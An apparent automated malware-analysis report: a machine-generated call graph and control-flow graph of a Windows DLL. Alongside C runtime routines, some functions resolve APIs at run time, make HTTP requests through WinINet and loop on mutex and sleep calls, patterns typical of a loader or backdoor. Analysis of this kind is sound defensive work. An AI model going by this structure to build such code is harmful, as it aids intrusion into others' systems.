GetCPInfo 8463->8737 8467 7ffe1a517f5a 8466->8467 8471 7ffe1a517fbb 8466->8471 8468 7ffe1a519d78 _getptd 65 API calls 8467->8468 8469 7ffe1a517f5f 8468->8469 8470 7ffe1a517f94 8469->8470 8474 7ffe1a51a250 8469->8474 8470->8471 8473 7ffe1a51a648 __updatetmbcinfo 65 API calls 8470->8473 8471->8450 8471->8451 8473->8471 8475 7ffe1a519d78 _getptd 65 API calls 8474->8475 8476 7ffe1a51a25b 8475->8476 8477 7ffe1a51a284 8476->8477 8478 7ffe1a51a276 8476->8478 8479 7ffe1a51dbec _lock 65 API calls 8477->8479 8480 7ffe1a519d78 _getptd 65 API calls 8478->8480 8481 7ffe1a51a28e 8479->8481 8485 7ffe1a51a27b 8480->8485 8488 7ffe1a51a2c8 8481->8488 8486 7ffe1a51a2bc 8485->8486 8487 7ffe1a51b234 _amsg_exit 65 API calls 8485->8487 8486->8470 8487->8486 8489 7ffe1a51a2a2 8488->8489 8490 7ffe1a51a2da _updatetlocinfoEx_nolock 8488->8490 8492 7ffe1a51dddc LeaveCriticalSection 8489->8492 8490->8489 8493 7ffe1a51a014 8490->8493 8494 7ffe1a51a0b0 8493->8494 8500 7ffe1a51a037 8493->8500 8495 7ffe1a51a103 8494->8495 8496 7ffe1a51bd68 free 65 API calls 8494->8496 8516 7ffe1a51a130 8495->8516 8561 7ffe1a51df6c 8495->8561 8498 7ffe1a51a0d4 8496->8498 8501 7ffe1a51bd68 free 65 API calls 8498->8501 8500->8494 8502 7ffe1a51a076 8500->8502 8507 7ffe1a51bd68 free 65 API calls 8500->8507 8508 7ffe1a51a0e8 8501->8508 8503 7ffe1a51a098 8502->8503 8513 7ffe1a51bd68 free 65 API calls 8502->8513 8504 7ffe1a51bd68 free 65 API calls 8503->8504 8509 7ffe1a51a0a4 8504->8509 8505 7ffe1a51a18e 8506 7ffe1a51bd68 free 65 API calls 8506->8516 8510 7ffe1a51a06a 8507->8510 8512 7ffe1a51bd68 free 65 API calls 8508->8512 8514 7ffe1a51bd68 free 65 API calls 8509->8514 8521 7ffe1a51ddf4 8510->8521 8511 7ffe1a51bd68 65 API calls free 8511->8516 8517 7ffe1a51a0f7 8512->8517 8518 7ffe1a51a08c 8513->8518 8514->8494 8516->8505 8516->8511 8520 7ffe1a51bd68 free 65 API calls 8517->8520 8549 7ffe1a51df00 8518->8549 8520->8495 8522 7ffe1a51ddfd 8521->8522 8547 7ffe1a51def8 8521->8547 8523 7ffe1a51de17 8522->8523 8524 7ffe1a51bd68 free 65 API calls 8522->8524 8525 7ffe1a51de29 8523->8525 8526 7ffe1a51bd68 free 65 API calls 8523->8526 8524->8523 8527 7ffe1a51de3b 8525->8527 8528 7ffe1a51bd68 free 65 API calls 8525->8528 8526->8525 8529 7ffe1a51de4d 8527->8529 8530 7ffe1a51bd68 free 65 API calls 8527->8530 8528->8527 8531 7ffe1a51de5f 8529->8531 8532 7ffe1a51bd68 free 65 API calls 8529->8532 8530->8529 8533 7ffe1a51de71 8531->8533 8535 7ffe1a51bd68 free 65 API calls 8531->8535 8532->8531 8534 7ffe1a51de83 8533->8534 8536 7ffe1a51bd68 free 65 API calls 8533->8536 8537 7ffe1a51de95 8534->8537 8538 7ffe1a51bd68 free 65 API calls 8534->8538 8535->8533 8536->8534 8539 7ffe1a51bd68 free 65 API calls 8537->8539 8540 7ffe1a51dea7 8537->8540 8538->8537 8539->8540 8541 7ffe1a51deb9 8540->8541 8542 7ffe1a51bd68 free 65 API calls 8540->8542 8543 7ffe1a51dece 8541->8543 8545 7ffe1a51bd68 free 65 API calls 8541->8545 8542->8541 8544 7ffe1a51dee3 8543->8544 8546 7ffe1a51bd68 free 65 API calls 8543->8546 8544->8547 8548 7ffe1a51bd68 free 65 API calls 8544->8548 8545->8543 8546->8544 8547->8502 8548->8547 8550 7ffe1a51df66 8549->8550 8552 7ffe1a51df05 8549->8552 8550->8503 8551 7ffe1a51df1e 8554 7ffe1a51df30 8551->8554 8555 7ffe1a51bd68 free 65 API calls 8551->8555 8552->8551 8553 7ffe1a51bd68 free 65 API calls 8552->8553 8553->8551 8556 7ffe1a51df42 8554->8556 8557 7ffe1a51bd68 free 65 API calls 8554->8557 8555->8554 8558 7ffe1a51df54 8556->8558 8559 7ffe1a51bd68 free 65 API calls 8556->8559 8557->8556 8558->8550 8560 7ffe1a51bd68 free 65 API calls 8558->8560 8559->8558 8560->8550 8562 7ffe1a51a124 8561->8562 8563 7ffe1a51df75 8561->8563 8562->8506 8564 7ffe1a51bd68 free 65 API calls 8563->8564 8565 7ffe1a51df86 8564->8565 8566 7ffe1a51bd68 free 65 API calls 8565->8566 8567 7ffe1a51df8f 8566->8567 8568 7ffe1a51bd68 free 65 API calls 8567->8568 8569 7ffe1a51df98 8568->8569 8570 7ffe1a51bd68 free 65 API calls 8569->8570 8571 7ffe1a51dfa1 8570->8571 8572 7ffe1a51bd68 free 65 API calls 8571->8572 8573 7ffe1a51dfaa 8572->8573 8574 7ffe1a51bd68 free 65 API calls 8573->8574 8575 7ffe1a51dfb3 8574->8575 8576 7ffe1a51bd68 free 65 API calls 8575->8576 8577 7ffe1a51dfbb 8576->8577 8578 7ffe1a51bd68 free 65 API calls 8577->8578 8579 7ffe1a51dfc4 8578->8579 8580 7ffe1a51bd68 free 65 API calls 8579->8580 8581 7ffe1a51dfcd 8580->8581 8582 7ffe1a51bd68 free 65 API calls 8581->8582 8583 7ffe1a51dfd6 8582->8583 8584 7ffe1a51bd68 free 65 API calls 8583->8584 8585 7ffe1a51dfdf 8584->8585 8586 7ffe1a51bd68 free 65 API calls 8585->8586 8587 7ffe1a51dfe8 8586->8587 8588 7ffe1a51bd68 free 65 API calls 8587->8588 8589 7ffe1a51dff1 8588->8589 8590 7ffe1a51bd68 free 65 API calls 8589->8590 8591 7ffe1a51dffa 8590->8591 8592 7ffe1a51bd68 free 65 API calls 8591->8592 8593 7ffe1a51e003 8592->8593 8594 7ffe1a51bd68 free 65 API calls 8593->8594 8595 7ffe1a51e00c 8594->8595 8596 7ffe1a51bd68 free 65 API calls 8595->8596 8597 7ffe1a51e018 8596->8597 8598 7ffe1a51bd68 free 65 API calls 8597->8598 8599 7ffe1a51e024 8598->8599 8600 7ffe1a51bd68 free 65 API calls 8599->8600 8601 7ffe1a51e030 8600->8601 8602 7ffe1a51bd68 free 65 API calls 8601->8602 8603 7ffe1a51e03c 8602->8603 8604 7ffe1a51bd68 free 65 API calls 8603->8604 8605 7ffe1a51e048 8604->8605 8606 7ffe1a51bd68 free 65 API calls 8605->8606 8607 7ffe1a51e054 8606->8607 8608 7ffe1a51bd68 free 65 API calls 8607->8608 8609 7ffe1a51e060 8608->8609 8610 7ffe1a51bd68 free 65 API calls 8609->8610 8611 7ffe1a51e06c 8610->8611 8612 7ffe1a51bd68 free 65 API calls 8611->8612 8613 7ffe1a51e078 8612->8613 8614 7ffe1a51bd68 free 65 API calls 8613->8614 8615 7ffe1a51e084 8614->8615 8616 7ffe1a51bd68 free 65 API calls 8615->8616 8617 7ffe1a51e090 8616->8617 8618 7ffe1a51bd68 free 65 API calls 8617->8618 8619 7ffe1a51e09c 8618->8619 8620 7ffe1a51bd68 free 65 API calls 8619->8620 8621 7ffe1a51e0a8 8620->8621 8622 7ffe1a51bd68 free 65 API calls 8621->8622 8623 7ffe1a51e0b4 8622->8623 8624 7ffe1a51bd68 free 65 API calls 8623->8624 8625 7ffe1a51e0c0 8624->8625 8626 7ffe1a51bd68 free 65 API calls 8625->8626 8627 7ffe1a51e0cc 8626->8627 8628 7ffe1a51bd68 free 65 API calls 8627->8628 8629 7ffe1a51e0d8 8628->8629 8630 7ffe1a51bd68 free 65 API calls 8629->8630 8631 7ffe1a51e0e4 8630->8631 8632 7ffe1a51bd68 free 65 API calls 8631->8632 8633 7ffe1a51e0f0 8632->8633 8634 7ffe1a51bd68 free 65 API calls 8633->8634 8635 7ffe1a51e0fc 8634->8635 8636 7ffe1a51bd68 free 65 API calls 8635->8636 8637 7ffe1a51e108 8636->8637 8638 7ffe1a51bd68 free 65 API calls 8637->8638 8639 7ffe1a51e114 8638->8639 8640 7ffe1a51bd68 free 65 API calls 8639->8640 8641 7ffe1a51e120 8640->8641 8642 7ffe1a51bd68 free 65 API calls 8641->8642 8643 7ffe1a51e12c 8642->8643 8644 7ffe1a51bd68 free 65 API calls 8643->8644 8645 7ffe1a51e138 8644->8645 8646 7ffe1a51bd68 free 65 API calls 8645->8646 8647 7ffe1a51e144 8646->8647 8648 7ffe1a51bd68 free 65 API calls 8647->8648 8649 7ffe1a51e150 8648->8649 8650 7ffe1a51bd68 free 65 API calls 8649->8650 8651 7ffe1a51e15c 8650->8651 8652 7ffe1a51bd68 free 65 API calls 8651->8652 8653 7ffe1a51e168 8652->8653 8654 7ffe1a51bd68 free 65 API calls 8653->8654 8655 7ffe1a51e174 8654->8655 8656 7ffe1a51bd68 free 65 API calls 8655->8656 8657 7ffe1a51e180 8656->8657 8658 7ffe1a51bd68 free 65 API calls 8657->8658 8659 7ffe1a51e18c 8658->8659 8660 7ffe1a51bd68 free 65 API calls 8659->8660 8661 7ffe1a51e198 8660->8661 8662 7ffe1a51bd68 free 65 API calls 8661->8662 8663 7ffe1a51e1a4 8662->8663 8664 7ffe1a51bd68 free 65 API calls 8663->8664 8665 7ffe1a51e1b0 8664->8665 8666 7ffe1a51bd68 free 65 API calls 8665->8666 8667 7ffe1a51e1bc 8666->8667 8668 7ffe1a51bd68 free 65 API calls 8667->8668 8669 7ffe1a51e1c8 8668->8669 8670 7ffe1a51bd68 free 65 API calls 8669->8670 8671 7ffe1a51e1d4 8670->8671 8672 7ffe1a51bd68 free 65 API calls 8671->8672 8673 7ffe1a51e1e0 8672->8673 8674 7ffe1a51bd68 free 65 API calls 8673->8674 8675 7ffe1a51e1ec 8674->8675 8676 7ffe1a51bd68 free 65 API calls 8675->8676 8677 7ffe1a51e1f8 8676->8677 8678 7ffe1a51bd68 free 65 API calls 8677->8678 8679 7ffe1a51e204 8678->8679 8680 7ffe1a51bd68 free 65 API calls 8679->8680 8681 7ffe1a51e210 8680->8681 8682 7ffe1a51bd68 free 65 API calls 8681->8682 8683 7ffe1a51e21c 8682->8683 8684 7ffe1a51bd68 free 65 API calls 8683->8684 8685 7ffe1a51e228 8684->8685 8686 7ffe1a51bd68 free 65 API calls 8685->8686 8687 7ffe1a51e234 8686->8687 8688 7ffe1a51bd68 free 65 API calls 8687->8688 8689 7ffe1a51e240 8688->8689 8690 7ffe1a51bd68 free 65 API calls 8689->8690 8691 7ffe1a51e24c 8690->8691 8692 7ffe1a51bd68 free 65 API calls 8691->8692 8693 7ffe1a51e258 8692->8693 8694 7ffe1a51bd68 free 65 API calls 8693->8694 8695 7ffe1a51e264 8694->8695 8696 7ffe1a51bd68 free 65 API calls 8695->8696 8697 7ffe1a51e270 8696->8697 8698 7ffe1a51bd68 free 65 API calls 8697->8698 8699 7ffe1a51e27c 8698->8699 8700 7ffe1a51bd68 free 65 API calls 8699->8700 8701 7ffe1a51e288 8700->8701 8702 7ffe1a51bd68 free 65 API calls 8701->8702 8703 7ffe1a51e294 8702->8703 8704 7ffe1a51bd68 free 65 API calls 8703->8704 8705 7ffe1a51e2a0 8704->8705 8706 7ffe1a51bd68 free 65 API calls 8705->8706 8707 7ffe1a51e2ac 8706->8707 8708 7ffe1a51bd68 free 65 API calls 8707->8708 8709 7ffe1a51e2b8 8708->8709 8710 7ffe1a51bd68 free 65 API calls 8709->8710 8711 7ffe1a51e2c4 8710->8711 8712 7ffe1a51bd68 free 65 API calls 8711->8712 8713 7ffe1a51e2d0 8712->8713 8714 7ffe1a51bd68 free 65 API calls 8713->8714 8715 7ffe1a51e2dc 8714->8715 8716 7ffe1a51bd68 free 65 API calls 8715->8716 8717 7ffe1a51e2e8 8716->8717 8718 7ffe1a51bd68 free 65 API calls 8717->8718 8719 7ffe1a51e2f4 8718->8719 8720 7ffe1a51bd68 free 65 API calls 8719->8720 8721 7ffe1a51e300 8720->8721 8722 7ffe1a51bd68 free 65 API calls 8721->8722 8723 7ffe1a51e30c 8722->8723 8724 7ffe1a51bd68 free 65 API calls 8723->8724 8725 7ffe1a51e318 8724->8725 8726 7ffe1a51bd68 free 65 API calls 8725->8726 8727 7ffe1a51e324 8726->8727 8728 7ffe1a51bd68 free 65 API calls 8727->8728 8729 7ffe1a51e330 8728->8729 8730 7ffe1a51bd68 free 65 API calls 8729->8730 8731 7ffe1a51e33c 8730->8731 8732 7ffe1a51bd68 free 65 API calls 8731->8732 8733 7ffe1a51e348 8732->8733 8734 7ffe1a51bd68 free 65 API calls 8733->8734 8735 7ffe1a51e354 8734->8735 8736 7ffe1a51bd68 free 65 API calls 8735->8736 8736->8562 8738 7ffe1a51a58d 8737->8738 8743 7ffe1a51a4ad 8737->8743 8740 7ffe1a51c9d0 _cftoe_l 7 API calls 8738->8740 8742 7ffe1a51a630 8740->8742 8742->8457 8747 7ffe1a51e864 8743->8747 8746 7ffe1a51e654 __crtLCMapStringA 69 API calls 8746->8738 8748 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 8747->8748 8749 7ffe1a51e888 8748->8749 8757 7ffe1a51e6ec 8749->8757 8752 7ffe1a51e654 8753 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 8752->8753 8754 7ffe1a51e679 8753->8754 8788 7ffe1a51e368 8754->8788 8758 7ffe1a51e734 MultiByteToWideChar 8757->8758 8759 7ffe1a51e72d 8757->8759 8760 7ffe1a51e75e 8758->8760 8767 7ffe1a51e757 8758->8767 8759->8758 8768 7ffe1a51e78d __crtLCMapStringA_stat _call_reportfault 8760->8768 8770 7ffe1a51f8b8 8760->8770 8761 7ffe1a51c9d0 _cftoe_l 7 API calls 8762 7ffe1a51a521 8761->8762 8762->8752 8763 7ffe1a51e7f3 MultiByteToWideChar 8765 7ffe1a51e814 GetStringTypeW 8763->8765 8766 7ffe1a51e829 8763->8766 8765->8766 8766->8767 8769 7ffe1a51bd68 free 65 API calls 8766->8769 8767->8761 8768->8763 8768->8767 8769->8767 8771 7ffe1a51f94c 8770->8771 8782 7ffe1a51f8d0 8770->8782 8772 7ffe1a51f498 _callnewh DecodePointer 8771->8772 8773 7ffe1a51f951 8772->8773 8775 7ffe1a519b98 _errno 64 API calls 8773->8775 8774 7ffe1a51f908 HeapAlloc 8777 7ffe1a51f941 8774->8777 8774->8782 8775->8777 8776 7ffe1a51ef3c _FF_MSGBANNER 64 API calls 8776->8782 8777->8768 8778 7ffe1a51f931 8781 7ffe1a519b98 _errno 64 API calls 8778->8781 8779 7ffe1a51efb0 _NMSG_WRITE 64 API calls 8779->8782 8784 7ffe1a51f936 8781->8784 8782->8774 8782->8776 8782->8778 8782->8779 8783 7ffe1a51b0d4 _mtinitlocknum 3 API calls 8782->8783 8782->8784 8786 7ffe1a51f498 DecodePointer 8782->8786 8783->8782 8785 7ffe1a519b98 _errno 64 API calls 8784->8785 8785->8777 8787 7ffe1a51f4b3 8786->8787 8787->8782 8790 7ffe1a51e3a8 MultiByteToWideChar 8788->8790 8791 7ffe1a51e410 8790->8791 8796 7ffe1a51e417 8790->8796 8793 7ffe1a51c9d0 _cftoe_l 7 API calls 8791->8793 8792 7ffe1a51e49c MultiByteToWideChar 8794 7ffe1a51e4c2 8792->8794 8795 7ffe1a51e527 8792->8795 8797 7ffe1a51a554 8793->8797 8813 7ffe1a51ee54 8794->8813 8795->8791 8801 7ffe1a51bd68 free 65 API calls 8795->8801 8799 7ffe1a51e452 __crtLCMapStringA_stat 8796->8799 8802 7ffe1a51f8b8 malloc 65 API calls 8796->8802 8797->8746 8799->8791 8799->8792 8801->8791 8802->8799 8803 7ffe1a51e4f6 8803->8795 8804 7ffe1a51ee54 __crtCompareStringEx LCMapStringW 8803->8804 8804->8795 8805 7ffe1a51e52c 8807 7ffe1a51f8b8 malloc 65 API calls 8805->8807 8810 7ffe1a51e559 __crtLCMapStringA_stat 8805->8810 8806 7ffe1a51ee54 __crtCompareStringEx LCMapStringW 8808 7ffe1a51e5c8 8806->8808 8807->8810 8809 7ffe1a51e60a 8808->8809 8811 7ffe1a51e5ff WideCharToMultiByte 8808->8811 8809->8795 8812 7ffe1a51bd68 free 65 API calls 8809->8812 8810->8795 8810->8806 8811->8809 8812->8795 8814 7ffe1a51eea6 __crtDownlevelLocaleNameToLCID 8813->8814 8816 7ffe1a51e4e0 8813->8816 8815 7ffe1a51eeab LCMapStringW 8814->8815 8815->8816 8816->8795 8816->8803 8816->8805 8818 7ffe1a51f7c4 8817->8818 8819 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 8818->8819 8820 7ffe1a51f7e8 8819->8820 8820->8408 8822 7ffe1a51f85f 8821->8822 8823 7ffe1a51f869 8821->8823 8822->8823 8828 7ffe1a51f885 8822->8828 8824 7ffe1a519b98 _errno 65 API calls 8823->8824 8825 7ffe1a51f871 8824->8825 8826 7ffe1a518d80 _invalid_parameter_noinfo 14 API calls 8825->8826 8827 7ffe1a51f87d 8826->8827 8827->8332 8828->8827 8829 7ffe1a519b98 _errno 65 API calls 8828->8829 8829->8825 8831 7ffe1a51dbc3 EncodePointer 8830->8831 8831->8831 8832 7ffe1a51dbde 8831->8832 8832->8339 8836 7ffe1a51f334 8833->8836 8849 7ffe1a51b3f8 8836->8849 8851 7ffe1a51fa59 8850->8851 8856 7ffe1a51fa76 8850->8856 8852 7ffe1a51fa67 8851->8852 8851->8856 8854 7ffe1a519b98 _errno 64 API calls 8852->8854 8853 7ffe1a51fa8e HeapAlloc 8855 7ffe1a51fa6c 8853->8855 8853->8856 8854->8855 8855->8373 8856->8853 8856->8855 8857 7ffe1a51f498 _callnewh DecodePointer 8856->8857 8857->8856 8859 7ffe1a519d30 8858->8859 8860 7ffe1a519c11 8858->8860 8859->8378 8861 7ffe1a519c2c 8860->8861 8862 7ffe1a51bd68 free 65 API calls 8860->8862 8863 7ffe1a519c3a 8861->8863 8864 7ffe1a51bd68 free 65 API calls 8861->8864 8862->8861 8865 7ffe1a519c48 8863->8865 8866 7ffe1a51bd68 free 65 API calls 8863->8866 8864->8863 8867 7ffe1a519c56 8865->8867 8869 7ffe1a51bd68 free 65 API calls 8865->8869 8866->8865 8868 7ffe1a519c64 8867->8868 8870 7ffe1a51bd68 free 65 API calls 8867->8870 8871 7ffe1a519c72 8868->8871 8872 7ffe1a51bd68 free 65 API calls 8868->8872 8869->8867 8870->8868 8873 7ffe1a519c83 8871->8873 8874 7ffe1a51bd68 free 65 API calls 8871->8874 8872->8871 8875 7ffe1a519c9b 8873->8875 8876 7ffe1a51bd68 free 65 API calls 8873->8876 8874->8873 8877 7ffe1a51dbec _lock 65 API calls 8875->8877 8876->8875 8880 7ffe1a519ca7 8877->8880 8878 7ffe1a519cd4 8890 7ffe1a51dddc LeaveCriticalSection 8878->8890 8880->8878 8882 7ffe1a51bd68 free 65 API calls 8880->8882 8882->8878 9751 7ffe1a522ffc 9752 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9751->9752 9753 7ffe1a52301a 9752->9753 9754 7ffe1a52307f 9753->9754 9755 7ffe1a523022 9753->9755 9756 7ffe1a5230a0 9754->9756 9757 7ffe1a51d6fc _isleadbyte_l 65 API calls 9754->9757 9761 7ffe1a52303f 9755->9761 9763 7ffe1a52088c 9755->9763 9758 7ffe1a519b98 _errno 65 API calls 9756->9758 9760 7ffe1a5230a4 9756->9760 9757->9756 9758->9760 9762 7ffe1a51e654 __crtLCMapStringA 69 API calls 9760->9762 9762->9761 9764 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9763->9764 9765 7ffe1a5208ae 9764->9765 9766 7ffe1a5208b8 9765->9766 9767 7ffe1a51d6fc _isleadbyte_l 65 API calls 9765->9767 9766->9761 9768 7ffe1a5208db 9767->9768 9769 7ffe1a51e864 __crtGetStringTypeA 68 API calls 9768->9769 9769->9766 9295 7ffe1a517b80 9296 7ffe1a517900 12 API calls 9295->9296 9297 7ffe1a517b8d 9296->9297 9298 7ffe1a515100 9301 7ffe1a515118 9298->9301 9299 7ffe1a516790 2 API calls 9299->9301 9300 7ffe1a517740 15 API calls 9300->9301 9301->9299 9301->9300 9302 7ffe1a515142 9301->9302 9770 7ffe1a5150c0 GetTickCount 9771 7ffe1a517f00 65 API calls 9770->9771 9772 7ffe1a5150db 9771->9772 9773 7ffe1a517ed4 rand 65 API calls 9772->9773 9774 7ffe1a5150e0 9773->9774 9775 7ffe1a522cc0 9776 7ffe1a522cc8 9775->9776 9777 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9776->9777 9779 7ffe1a522cdb 9777->9779 9778 7ffe1a522cf7 9779->9778 9781 7ffe1a522f80 9779->9781 9782 7ffe1a522fa2 9781->9782 9785 7ffe1a522f92 9781->9785 9783 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9782->9783 9784 7ffe1a522fae 9783->9784 9784->9785 9786 7ffe1a52088c _isctype_l 68 API calls 9784->9786 9785->9779 9786->9785 9787 7ffe1a5240c3 9788 7ffe1a5240df 9787->9788 9789 7ffe1a5240d5 9787->9789 9791 7ffe1a51dddc LeaveCriticalSection 9789->9791 9792 7ffe1a51acc4 9793 7ffe1a51ad05 9792->9793 9794 7ffe1a51acda 9792->9794 9795 7ffe1a51dbec _lock 65 API calls 9794->9795 9796 7ffe1a51ace4 9795->9796 9797 7ffe1a51a2c8 _updatetlocinfoEx_nolock 65 API calls 9796->9797 9798 7ffe1a51acf4 9797->9798 9800 7ffe1a51dddc LeaveCriticalSection 9798->9800 9303 7ffe1a51ca88 9310 7ffe1a51fc50 9303->9310 9311 7ffe1a51fc5c 9310->9311 9312 7ffe1a51dbec _lock 65 API calls 9311->9312 9319 7ffe1a51fc84 9312->9319 9313 7ffe1a51fd15 9334 7ffe1a51dddc LeaveCriticalSection 9313->9334 9317 7ffe1a51cbac _fflush_nolock LeaveCriticalSection 9317->9319 9318 7ffe1a51fb88 89 API calls _fflush_nolock 9318->9319 9319->9313 9319->9317 9319->9318 9329 7ffe1a51cb28 9319->9329 9330 7ffe1a51cb36 9329->9330 9331 7ffe1a51cb49 EnterCriticalSection 9329->9331 9332 7ffe1a51dbec _lock 65 API calls 9330->9332 9333 7ffe1a51cb3e 9332->9333 9333->9319 9801 7ffe1a51c748 9802 7ffe1a51c785 _IsNonwritableInCurrentImage __C_specific_handler 9801->9802 9803 7ffe1a51c85c 9801->9803 9802->9803 9804 7ffe1a51c827 RtlUnwindEx 9802->9804 9804->9802 9805 7ffe1a5149ca 9827 7ffe1a513f30 CreatePipe 9805->9827 9808 7ffe1a511c40 32 API calls 9809 7ffe1a514a4b 9808->9809 9810 7ffe1a514a58 9809->9810 9877 7ffe1a5159f0 GetProcessHeap HeapFree 9809->9877 9811 7ffe1a5147ba 9810->9811 9878 7ffe1a5159f0 GetProcessHeap HeapFree 9810->9878 9815 7ffe1a5122d0 23 API calls 9811->9815 9816 7ffe1a516790 2 API calls 9811->9816 9819 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 9811->9819 9820 7ffe1a514d47 9811->9820 9822 7ffe1a516790 GetProcessHeap HeapAlloc 9811->9822 9825 7ffe1a511c40 32 API calls 9811->9825 9879 7ffe1a5159f0 GetProcessHeap HeapFree 9811->9879 9815->9811 9817 7ffe1a514ce8 OpenMutexW 9816->9817 9817->9811 9818 7ffe1a514d06 CloseHandle 9817->9818 9818->9811 9819->9811 9880 7ffe1a5159f0 GetProcessHeap HeapFree 9820->9880 9822->9811 9825->9811 9828 7ffe1a513f9e SetHandleInformation 9827->9828 9829 7ffe1a514431 9827->9829 9830 7ffe1a513fc7 _call_reportfault 9828->9830 9829->9808 9829->9811 9831 7ffe1a5125b0 4 API calls 9830->9831 9833 7ffe1a513ffb 9831->9833 9832 7ffe1a514413 CloseHandle CloseHandle 9832->9829 9833->9832 9881 7ffe1a515980 GetProcessHeap HeapAlloc 9833->9881 8178 7ffe1a511c10 8179 7ffe1a511c34 8178->8179 8180 7ffe1a511c1d 8178->8180 8181 7ffe1a511c20 SleepEx 8180->8181 8181->8179 8181->8181 9886 7ffe1a514b50 9908 7ffe1a514450 9886->9908 9909 7ffe1a514474 9908->9909 9910 7ffe1a5168a0 107 API calls 9909->9910 9911 7ffe1a5144ba 9910->9911 9920 7ffe1a515980 GetProcessHeap HeapAlloc 9911->9920 9451 7ffe1a514c96 9452 7ffe1a5122d0 23 API calls 9451->9452 9465 7ffe1a5147ba 9452->9465 9454 7ffe1a516790 2 API calls 9455 7ffe1a514ce8 OpenMutexW 9454->9455 9456 7ffe1a514d06 CloseHandle 9455->9456 9455->9465 9456->9465 9457 7ffe1a514d23 GetModuleHandleW GetTickCount SleepEx 9457->9465 9458 7ffe1a514d47 9467 7ffe1a5159f0 GetProcessHeap HeapFree 9458->9467 9461 7ffe1a516790 GetProcessHeap HeapAlloc 9461->9465 9463 7ffe1a511c40 32 API calls 9463->9465 9465->9451 9465->9454 9465->9457 9465->9458 9465->9461 9465->9463 9465->9465 9466 7ffe1a5159f0 GetProcessHeap HeapFree 9465->9466 9468 7ffe1a524016 9469 7ffe1a524038 9468->9469 9471 7ffe1a52404a 9468->9471 9470 7ffe1a51895c _CRT_INIT 145 API calls 9469->9470 9470->9471 9472 7ffe1a524119 LeaveCriticalSection 9925 7ffe1a51f458 9926 7ffe1a519d78 _getptd 65 API calls 9925->9926 9927 7ffe1a51f461 9926->9927 9930 7ffe1a52061c 9927->9930 9939 7ffe1a51f4dc DecodePointer 9930->9939 9940 7ffe1a522bd8 9941 7ffe1a522be0 9940->9941 9942 7ffe1a517f44 _LocaleUpdate::_LocaleUpdate 65 API calls 9941->9942 9943 7ffe1a522bf3 9942->9943

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 7ffe1a511c40-7ffe1a511c78 1 7ffe1a511ca1-7ffe1a511ca8 0->1 2 7ffe1a511c7a-7ffe1a511c9c call 7ffe1a516790 LoadLibraryExW call 7ffe1a516830 0->2 4 7ffe1a511cd8-7ffe1a511cdf 1->4 5 7ffe1a511caa-7ffe1a511cd3 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 1->5 2->1 6 7ffe1a511d0f-7ffe1a511d16 4->6 7 7ffe1a511ce1-7ffe1a511d0a call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 4->7 5->4 11 7ffe1a511d46-7ffe1a511d4d 6->11 12 7ffe1a511d18-7ffe1a511d41 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 6->12 7->6 17 7ffe1a511d4f-7ffe1a511d78 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 11->17 18 7ffe1a511d7d-7ffe1a511d84 11->18 12->11 17->18 20 7ffe1a511db4-7ffe1a511dbb 18->20 21 7ffe1a511d86-7ffe1a511daf call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 18->21 26 7ffe1a511deb-7ffe1a511df2 20->26 27 7ffe1a511dbd-7ffe1a511de6 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 20->27 21->20 32 7ffe1a511e22-7ffe1a511e29 26->32 33 7ffe1a511df4-7ffe1a511e1d call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 26->33 27->26 38 7ffe1a511e59-7ffe1a511e74 InternetOpenW 32->38 39 7ffe1a511e2b-7ffe1a511e54 call 7ffe1a5166f0 GetProcAddress call 7ffe1a516830 32->39 33->32 41 7ffe1a512186-7ffe1a5121a6 38->41 42 7ffe1a511e7a-7ffe1a511efb InternetSetOptionW * 3 InternetConnectW 38->42 39->38 46 7ffe1a511f01-7ffe1a511f1d 42->46 47 7ffe1a51217d-7ffe1a512180 InternetCloseHandle 42->47 50 7ffe1a511f1f-7ffe1a511f31 call 7ffe1a516790 46->50 51 7ffe1a511f33-7ffe1a511f51 call 7ffe1a516790 46->51 47->41 56 7ffe1a511f55-7ffe1a511f8f HttpOpenRequestW call 7ffe1a516830 50->56 51->56 59 7ffe1a512172-7ffe1a512177 InternetCloseHandle 56->59 60 7ffe1a511f95-7ffe1a511fa0 56->60 59->47 61 7ffe1a511fa6-7ffe1a511fbc call 7ffe1a516790 60->61 62 7ffe1a51204a-7ffe1a51206f SetLastError HttpSendRequestW 60->62 70 7ffe1a511fc0-7ffe1a511fc7 61->70 64 7ffe1a512071-7ffe1a51207c GetLastError 62->64 65 7ffe1a5120da-7ffe1a5120ea call 7ffe1a515980 62->65 67 7ffe1a51207e-7ffe1a512083 64->67 68 7ffe1a512085-7ffe1a5120d4 InternetQueryOptionW InternetSetOptionW HttpSendRequestW 64->68 73 7ffe1a512169-7ffe1a51216c InternetCloseHandle 65->73 74 7ffe1a5120ec-7ffe1a512109 InternetReadFile 65->74 67->65 67->68 68->65 70->70 72 7ffe1a511fc9 70->72 75 7ffe1a511fd0-7ffe1a511fd7 72->75 73->59 76 7ffe1a512161-7ffe1a512164 call 7ffe1a5159f0 74->76 77 7ffe1a51210b 74->77 75->75 79 7ffe1a511fd9-7ffe1a511fef call 7ffe1a515980 75->79 76->73 80 7ffe1a512110-7ffe1a512116 77->80 87 7ffe1a511ff1-7ffe1a511ffa 79->87 88 7ffe1a512042-7ffe1a512045 call 7ffe1a516830 79->88 82 7ffe1a51214e-7ffe1a512150 80->82 83 7ffe1a512118-7ffe1a51214c call 7ffe1a5159b0 InternetReadFile 80->83 82->76 86 7ffe1a512152-7ffe1a51215f 82->86 83->80 83->82 86->73 91 7ffe1a512000-7ffe1a512010 87->91 88->62 91->91 92 7ffe1a512012 91->92 93 7ffe1a512016-7ffe1a51201e 92->93 93->93 